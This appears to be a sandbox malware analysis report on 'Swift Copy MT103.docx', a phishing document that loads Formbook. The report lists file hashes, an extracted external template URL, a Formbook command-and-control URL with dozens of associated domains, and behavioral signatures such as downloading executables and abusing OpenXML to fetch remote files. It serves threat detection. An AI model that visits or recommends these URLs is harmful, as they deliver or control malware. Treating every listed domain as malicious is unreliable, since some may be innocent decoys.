General
-
Target
Swift Copy MT103.docx
-
Size
10KB
-
Sample
210621-r2p3xgneaa
-
MD5
0af91d7b71322d26388ca7514ac04ec9
-
SHA1
1589484b4e088060c6d98be0f0722b1073ed5519
-
SHA256
4ff4f1d31926b86bc3d8bcdb13a445ec7637edd9f4ae48c153262a713c1f72b0
-
SHA512
f60f19dabde1702615224fa46f992aad77b5e8b3bb5c4a34c826a4bfc8b9f8ca4818820c3926a4094675487f2de842975b7211a649e07fca3ee56464839b79ba
Static task
static1
Behavioral task
behavioral1
Sample
Swift Copy MT103.docx
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Swift Copy MT103.docx
Resource
win10v20210408
Malware Config
Extracted
https://win32indexdummy_username@itsssl.com/JmQEk
Extracted
formbook
4.1
http://www.dragonpalcenk.com/k8n/
foxynailserie.com
thenoyzees.com
waterrising.xyz
allmister.com
theguyscave.com
erkitap.com
spyder-club.com
raskrutisam.com
giantledlights.com
wowbeautynails.com
youmovies.site
abjms.com
enso-solutions.com
seasonalcampgroundsmn.com
lukeprater.com
mufasacapital.com
idi360.com
mask-cleaner.com
aeruswilmde.com
venkatlifecoach.com
crochetandgabbana.com
onlineshreecollection.com
gwenythportillowightman.com
nexuspropertycare.com
progress.solutions
parkerut.com
achebones.com
jiazhengfu.com
chlamydiadeetz.com
thiele-concept.com
bayareataxattorney.com
geopainterdecorators.com
makemybuild.com
headsleepinstrument.online
finevinum.com
alphaworkoutgear.com
8765pk.com
rikonchat.com
gitchat.net
showy1.net
tellurideminer.com
triliumbrewing.com
fioriapartment.com
salubrigems.com
sctsmney.com
betgobar1.com
thomaspurcell.com
araket.com
parisfilmfestival.online
treepik.com
artemisnaturalhealing.com
littlehouseofhoarders.com
buyselllm.com
levnakava.com
mygolfbetter.com
vinlancer.com
beetalkmobile.press
gocampultralightmattress.com
direk99.net
nivxros.com
cbgdenver.com
datarock.net
docondemand.net
smithvilletexashistory.com
Targets
-
-
Target
Swift Copy MT103.docx
-
Size
10KB
-
MD5
0af91d7b71322d26388ca7514ac04ec9
-
SHA1
1589484b4e088060c6d98be0f0722b1073ed5519
-
SHA256
4ff4f1d31926b86bc3d8bcdb13a445ec7637edd9f4ae48c153262a713c1f72b0
-
SHA512
f60f19dabde1702615224fa46f992aad77b5e8b3bb5c4a34c826a4bfc8b9f8ca4818820c3926a4094675487f2de842975b7211a649e07fca3ee56464839b79ba
-
Formbook Payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-